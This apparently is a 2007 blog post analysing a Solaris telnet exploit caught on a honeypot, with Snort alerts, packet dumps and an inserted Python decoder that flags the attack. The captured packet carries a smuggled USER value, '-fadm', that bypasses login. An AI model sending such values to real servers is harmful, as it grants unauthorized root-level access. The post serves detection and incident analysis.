Thursday, March 01, 2007

Don't Use Telnet!


Today I got my first hit of the Solaris exploit (Worm?) on my honeypot. Both my Bleeding rules and my normal Snort registered rules fired on this single inbound packet.

# less alert | grep -A 4 -B 2 192.18.17.206
[**] [1:2003411:5] BLEEDING-EDGE EXPLOIT Solaris telnet USER environment vuln Attack inbound [**]
[Classification: Attempted User Privilege Gain] [Priority: 1]
03/01-13:44:29.556771 192.18.17.206:1134 -> 192.168.0.34:23
TCP TTL:46 TOS:0x0 ID:52835 IpLen:20 DgmLen:86 DF
***AP*** Seq: 0xED89493C Ack: 0x9D57147C Win: 0xC4E0 TcpLen: 20
[Xref => http://isc.sans.org/diary.html?n&storyid=2220][Xref => http://riosec.com/solaris-telnet-0-day]

[**] [1:10136:3] TELNET Solaris login environment variable authentication bypass attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
03/01-13:44:29.556771 192.18.17.206:1134 -> 192.168.0.34:23
TCP TTL:46 TOS:0x0 ID:52835 IpLen:20 DgmLen:86 DF
***AP*** Seq: 0xED89493C Ack: 0x9D57147C Win: 0xC4E0 TcpLen: 20
[Xref => http://www.securityfocus.com/bid/22512]

The below packet is the culprit:


# tcpdump -vvnnXs 1514 -r ../snort/snort.log.1172706692 port 23 | less
reading from file ../snort/snort.log.1172706692, link-type EN10MB (Ethernet)
13:44:29.556771 IP (tos 0x0, ttl 46, id 52835, offset 0, flags [DF], proto: TCP (6), length: 86) 192.18.17.206.1134 > 192.168.0.34.23: P, cksum 0x0fed (correct), 3985197372:3985197418(46) ack 2639729788 win 50400 [telnet WILL NAWS, SB NAWS IS 0x50 0 0x19 SE, WILL TERMINAL TYPE, SB TERMINAL TYPE IS 0x76 0x74 0x31 0x30 0x30 SE, WILL NEW-ENVIRON, SB NEW-ENVIRON IS 0 0x55 0x53 0x45 0x52 0x1 0x2d 0x66 0x61 0x64 0x6d SE]
0x0000: 4500 0056 ce63 4000 2e06 eb93 c012 11ce E..V.c@.........
0x0010: c0a8 0022 046e 0017 ed89 493c 9d57 147c ...".n....I<.W.|
0x0020: 5018 c4e0 0fed 0000 fffb 1fff fa1f 0050 P..............P
0x0030: 0019 fff0 fffb 18ff fa18 0076 7431 3030 ...........vt100
0x0040: fff0 fffb 27ff fa27 0000 5553 4552 012d ....'..'..USER.-
0x0050: 6661 646d fff0                          fadm..
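To make the negotiation in that payload explicit, here is a small decoder, added to this post as an example (it is not code from the original post, Snort, or the Bleeding Edge rules). It walks the Telnet IAC commands in the 46 TCP payload bytes transcribed from the hex dump above, pulls the NEW-ENVIRON variables out of the subnegotiation, and flags a USER value that begins with a dash, which is exactly what a rule for this attack needs to look for. The option and sub-option codes are the standard Telnet/RFC 1572 values; the payload constant is constructed from the dump on this page.

```python
"""Decode Telnet option negotiation and flag a USER value that starts with '-'."""

IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254
NEG_NAMES = {WILL: "WILL", WONT: "WONT", DO: "DO", DONT: "DONT"}
OPT_TTYPE, OPT_NAWS, OPT_NEW_ENVIRON = 24, 31, 39
# NEW-ENVIRON (RFC 1572) sub-option codes
ENV_IS, ENV_SEND, ENV_INFO = 0, 1, 2
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3

# TCP payload of the packet above (bytes 0x28..0x55 of the dump), transcribed by hand.
PAYLOAD = bytes.fromhex(
    "fffb1f" "fffa1f 00500019 fff0"            # WILL NAWS, SB NAWS 80x25
    "fffb18" "fffa18 00 7674313030 fff0"       # WILL TTYPE, SB TTYPE IS "vt100"
    "fffb27" "fffa27 00 00 55534552 01 2d6661646d fff0"  # SB NEW-ENVIRON IS VAR "USER" VALUE "-fadm"
)


def parse_telnet(data: bytes):
    """Split a Telnet byte stream into (kind, option, payload) tuples.

    kind is one of WILL/WONT/DO/DONT (payload empty), SB (payload = bytes
    between the option code and IAC SE), CMD (other two-byte command) or DATA.
    """
    cmds, text, i = [], bytearray(), 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
            continue
        if text:
            cmds.append(("DATA", None, bytes(text)))
            text = bytearray()
        if i + 1 >= len(data):
            raise ValueError("truncated IAC")
        cmd = data[i + 1]
        if cmd == IAC:                      # IAC IAC is an escaped 0xff data byte
            text.append(IAC)
            i += 2
        elif cmd in NEG_NAMES:
            if i + 2 >= len(data):
                raise ValueError("truncated option negotiation")
            cmds.append((NEG_NAMES[cmd], data[i + 2], b""))
            i += 3
        elif cmd == SB:
            j, body = i + 2, bytearray()
            while True:                     # scan to IAC SE, honouring IAC IAC escapes
                if j + 1 >= len(data):
                    raise ValueError("unterminated subnegotiation")
                if data[j] == IAC:
                    if data[j + 1] == SE:
                        break
                    if data[j + 1] == IAC:
                        body.append(IAC)
                        j += 2
                        continue
                    raise ValueError("unexpected IAC inside subnegotiation")
                body.append(data[j])
                j += 1
            if not body:
                raise ValueError("empty subnegotiation")
            cmds.append(("SB", body[0], bytes(body[1:])))
            i = j + 2
        else:                               # NOP, GA, etc. carry no payload
            cmds.append(("CMD", cmd, b""))
            i += 2
    if text:
        cmds.append(("DATA", None, bytes(text)))
    return cmds


def parse_new_environ(payload: bytes) -> dict:
    """Parse a NEW-ENVIRON IS/INFO body into {name: value}; value is None if absent."""
    if not payload or payload[0] not in (ENV_IS, ENV_INFO):
        return {}
    env, name, value, cur, i = {}, None, None, None, 1
    while i < len(payload):
        b = payload[i]
        if b in (ENV_VAR, ENV_USERVAR):     # start of a new variable name
            if name is not None:
                env[name.decode("latin-1")] = None if value is None else value.decode("latin-1")
            name, value = bytearray(), None
            cur = name
        elif b == ENV_VALUE:                # start of the value for the current name
            value = bytearray()
            cur = value
        elif b == ENV_ESC:                  # next byte is literal
            i += 1
            if i < len(payload) and cur is not None:
                cur.append(payload[i])
        elif cur is not None:
            cur.append(b)
        i += 1
    if name is not None:
        env[name.decode("latin-1")] = None if value is None else value.decode("latin-1")
    return env


def find_suspicious_user(data: bytes):
    """Return the USER value if a NEW-ENVIRON IS carries one beginning with '-', else None.

    A leading dash is what let in.telnetd hand login a "-f" option (CVE-2007-0882)."""
    for kind, opt, body in parse_telnet(data):
        if kind == "SB" and opt == OPT_NEW_ENVIRON:
            user = parse_new_environ(body).get("USER")
            if user is not None and user.startswith("-"):
                return user
    return None


if __name__ == "__main__":
    for kind, opt, body in parse_telnet(PAYLOAD):
        print(kind, opt, body)
    print("suspicious USER:", find_suspicious_user(PAYLOAD))
```

Run stand-alone it prints the six negotiation items and `suspicious USER: -fadm`; a legitimate client sending `USER` as `fadm` passes through `find_suspicious_user` as `None`.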

And flow data:

# tcpflow -cr honeytrap_00023_20070301125318 port 23
192.018.017.206.01134-192.168.000.034.00023: ...
192.018.017.206.01134-192.168.000.034.00023: .......P...........vt100....'..'..USER.-fadm..
192.168.000.034.00023-192.018.017.206.01134:

192.168.000.034.00023-192.018.017.206.01134:

The -f and the login name "adm" are plain to see: the client sends the USER environment variable with the value "-fadm". This is consistent with MITRE's description:

"The telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts"

Ref: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882